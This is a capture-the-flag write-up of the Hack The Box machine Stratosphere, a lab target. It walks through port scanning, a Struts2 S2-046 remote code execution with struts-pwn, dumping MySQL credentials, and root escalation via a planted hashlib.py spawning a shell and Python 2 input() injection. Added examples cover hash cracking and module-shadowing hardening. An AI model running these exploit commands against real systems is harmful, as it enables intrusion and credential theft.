Port Scanning

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:42 CST
Nmap scan report for 10.10.10.64
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds
┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:46 CST
Nmap scan report for 10.10.10.64
Host is up (0.068s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp open http
|_http-title: Stratosphere
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
<SNIP>
8080/tcp open http-proxy
|_http-title: Stratosphere
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
<SNIP>
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds
┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap --script=vuln -p22,80,8080 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:50 CST
Nmap scan report for 10.10.10.64
Host is up (0.067s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /manager/html/upload: Apache Tomcat (401 )
|_ /manager/html: Apache Tomcat (401 )
8080/tcp open http-proxy
| http-enum:
| /manager/html/upload: Apache Tomcat (401 )
|_ /manager/html: Apache Tomcat (401 )

Nmap done: 1 IP address (1 host up) scanned in 247.21 seconds

Tomcat? Well, /manager is indeed a Tomcat directory.

Struts2

Ports 80 and 8080 serve the same thing. There is a /manager, but it requires credentials, and the portal site itself looks to have no vulnerabilities at all, so let's enumerate directories.

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ gobuster dir -u http://10.10.10.64 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.64
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manager (Status: 302) [Size: 0] [--> /manager/]
/Monitoring (Status: 302) [Size: 0] [--> /Monitoring/]
/http%3A%2F%2Fwww (Status: 400) [Size: 813]

Besides manager there is also /Monitoring. Visiting it redirects to /Monitoring/example/Welcome.action, and so does the login page, which is clearly the Struts2 framework.

I remember having hit this on vulhub before, so let's bring out the all-in-one exploitation tool straight away.

┌──(mikannse㉿kali)-[~/tools/web/java/Struts2-Scan]
└─$ python Struts2Scan.py -u http://10.10.10.64/Monitoring/example/Welcome.action

____ _ _ ____ ____
/ ___|| |_ _ __ _ _| |_ ___|___ \ / ___| ___ __ _ _ __
\___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \
___) | |_| | | |_| | |_\__ \/ __/ ___) | (_| (_| | | | |
|____/ \__|_| \__,_|\__|___/_____| |____/ \___\__,_|_| |_|

Author By HatBoy

[+] 正在扫描URL:http://10.10.10.64/Monitoring/example/Welcome.action
[*] ----------------results------------------
[*] http://10.10.10.64/Monitoring/example/Welcome.action 存在漏洞: S2-046

It allows direct RCE: https://github.com/mazen160/struts-pwn

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c id

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: id
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

[%] Done.

Set up a reverse shell,

Database file

[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

Tomcat's user.xml

<user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui"/>

However, I could neither get a reverse shell nor get into the manager. There is also a MySQL instance listening locally on the box, so let's use the credentials obtained to look at the data.

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "show databases;"'

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "show databases;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

Database
information_schema
users

[%] Done.
┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "use users;show tables;"'

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "use users;show tables;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

Tables_in_users
accounts

[%] Done.
┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "use users;select * from accounts;"'

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "use users;select * from accounts;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

Privilege Escalation

With the credentials obtained I can SSH in, and richard can run a Python script with sudo.

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
richard@stratosphere:~$ cat test.py
#!/usr/bin/python3
import hashlib


def question():
    q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
    md5 = hashlib.md5()
    md5.update(q1.encode())
    if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
        print("Sorry, that's not right")
        return
    print("You got it!")
    q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
    sha1 = hashlib.sha1()
    sha1.update(q2.encode())
    if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
        print("Nope, that one didn't work...")
        return
    print("WOW, you're really good at this!")
    q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
    md4 = hashlib.new('md4')
    md4.update(q3.encode())
    if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
        print("Yeah, I don't think that's right.")
        return
    print("OK, OK! I get it. You know how to crack hashes...")
    q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
    blake = hashlib.new('BLAKE2b512')
    blake.update(q4.encode())
    if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
        print("You were so close! urg... sorry rules are rules.")
        return

    import os
    os.system('/root/success.py')
    return

question()

A small hash-cracking game. The first few can be solved with online lookup sites; the last one has to be cracked offline with the hash type specified explicitly.

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-Blake2 hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-Blake2 [BLAKE2b 512 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fhero6610 (?)
1g 0:00:00:01 DONE (2024-09-10 12:55) 0.9433g/s 10634Kp/s 10634Kc/s 10634KC/s Ganama25..DAKOTA31
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
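The four checks in test.py all hash the raw input the same way (UTF-8 encode, hexdigest), so an offline wordlist audit only needs the right algorithm name. The following is an added example, not code from the box or the original writeup; it uses a small constructed wordlist in place of rockyou.txt. Two caveats matter in practice: `BLAKE2b512` is the OpenSSL name, which `hashlib.blake2b` provides natively, and `hashlib.new('md4')` raises `ValueError` on Python builds linked against OpenSSL 3 unless the legacy provider is loaded, so the code reports that instead of crashing (the box's own test.py would fail at the third question on such a build).

```python
"""Offline wordlist audit for the hash types used by test.py (added example)."""
import hashlib
from typing import Callable, Iterable, Optional


def make_hasher(algo: str) -> Optional[Callable[[bytes], str]]:
    """Return a hexdigest function for one of the names test.py uses,
    or None when this OpenSSL build does not provide the algorithm."""
    name = algo.lower()
    # 'BLAKE2b512' is OpenSSL's name; hashlib.blake2b is the always-available
    # built-in with the same 64-byte digest, so prefer it.
    if name == "blake2b512":
        return lambda data: hashlib.blake2b(data).hexdigest()
    try:
        hashlib.new(name)  # probe: md4 is 'legacy' in OpenSSL 3 and may be missing
    except ValueError:
        return None
    return lambda data: hashlib.new(name, data).hexdigest()


def digest_of(word: str, algo: str) -> str:
    """Hash one candidate exactly as test.py does (UTF-8 encode, hexdigest)."""
    hasher = make_hasher(algo)
    if hasher is None:
        raise ValueError(f"hash algorithm {algo!r} is not available in this build")
    return hasher(word.encode())


def crack(hexdigest: str, algo: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose digest matches, or None."""
    hasher = make_hasher(algo)
    if hasher is None:
        raise ValueError(f"hash algorithm {algo!r} is not available in this build")
    target = hexdigest.strip().lower()
    for line in wordlist:
        word = line.rstrip("\n")  # wordlist files carry trailing newlines
        if hasher(word.encode()) == target:
            return word
    return None


# Constructed stand-in for rockyou.txt; not taken from the page.
SAMPLE_WORDLIST = ["password", "letmein", "hunter2", "qwerty", "Fhero6610"]


if __name__ == "__main__":
    # Self-check: hash a known word with each algorithm test.py uses and recover it.
    for algo in ("md5", "sha1", "md4", "BLAKE2b512"):
        try:
            print(algo, crack(digest_of("hunter2", algo), algo, SAMPLE_WORDLIST))
        except ValueError as exc:
            print(algo, "skipped:", exc)
```

To audit a real digest, pass it with the matching name (`crack(digest, "BLAKE2b512", open("/usr/share/wordlists/rockyou.txt", encoding="latin-1"))`); the `ValueError` on md4 is the signal to enable OpenSSL's legacy provider or use a tool such as john, as the writeup does.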

However, it was a trick: there is no /root/success.py at all. Instead, create a hashlib.py in this directory, because Python resolves imports from the script's own directory first (it is placed at the front of sys.path), so the local file shadows the standard library module.

richard@stratosphere:~$ echo "import os;os.system('/bin/bash')" >hashlib.py
richard@stratosphere:~$ sudo /usr/bin/python3.7 /home/richard/test.py
root@stratosphere:/home/richard# whoami
root
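Why the planted hashlib.py wins, and what closes the hole, as an added example that is not code from the box or the original writeup: when Python runs a script it puts the script's directory at the front of `sys.path`, so any module file the invoking user can drop there shadows the standard library. Running the interpreter with `-I` (isolated mode) leaves that directory off `sys.path`, and placing the sudo target in a root-owned directory removes the write access that makes the trick possible. The temporary directories, the stand-in test.py and the harmless marker module below are constructed by the example.

```python
"""Module-shadowing demo for a sudo'd Python script (added example)."""
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for /home/richard/test.py: it only reports which
# hashlib module the interpreter actually bound.
SCRIPT = "import os, hashlib\nprint(os.path.abspath(hashlib.__file__))\n"
# Harmless stand-in for the planted hashlib.py: a marker, not a shell.
SHADOW = "PLANTED = True\n"


def resolved_hashlib(script_dir: str, isolated: bool) -> str:
    """Run script_dir/test.py, with or without -I, and return the hashlib path it imported."""
    cmd = [sys.executable]
    if isolated:
        cmd.append("-I")  # isolated mode: the script's directory is not put on sys.path
    cmd.append(os.path.join(script_dir, "test.py"))
    env = dict(os.environ)
    env.pop("PYTHONSAFEPATH", None)  # make the non-isolated run show the default behaviour
    # Run from a different cwd on purpose: the shadow works because of the
    # script's directory, not the caller's working directory.
    proc = subprocess.run(cmd, capture_output=True, text=True, check=True,
                          cwd=tempfile.gettempdir(), env=env)
    return proc.stdout.strip()


def shadow_demo() -> tuple:
    """Return (shadowed_by_default, shadowed_with_isolated_mode)."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "test.py"), "w") as f:
            f.write(SCRIPT)
        with open(os.path.join(d, "hashlib.py"), "w") as f:
            f.write(SHADOW)
        planted = os.path.realpath(os.path.join(d, "hashlib.py"))
        by_default = os.path.realpath(resolved_hashlib(d, False)) == planted
        with_isolated = os.path.realpath(resolved_hashlib(d, True)) == planted
    return by_default, with_isolated


def caller_can_plant_modules(script_path: str) -> bool:
    """Audit check for a sudo rule pointing at script_path: the risk is not the
    script itself being writable but its directory being writable by the caller."""
    return os.access(os.path.dirname(os.path.abspath(script_path)), os.W_OK)


if __name__ == "__main__":
    default_hit, isolated_hit = shadow_demo()
    print("planted hashlib.py used by default:", default_hit)
    print("planted hashlib.py used with -I:   ", isolated_hit)
```

The sudoers rule on the box also uses a `python*` wildcard, which is what lets the caller pick python2.7 for the second route below; pinning a single interpreter path and an absolute, root-owned script location addresses both routes.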

Alternatively, you can exploit the behaviour of Python 2's input(): in Python 2, input() is equivalent to eval(raw_input()), so you can also do:

richard@stratosphere:~$ sudo /usr/bin/python2.7 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('/bin/bash')
root@stratosphere:/home/richard# whoami
root

Closing Thoughts

This was my first time hitting Struts2; the later part was still fairly simple. I need to practise more Java vulnerabilities.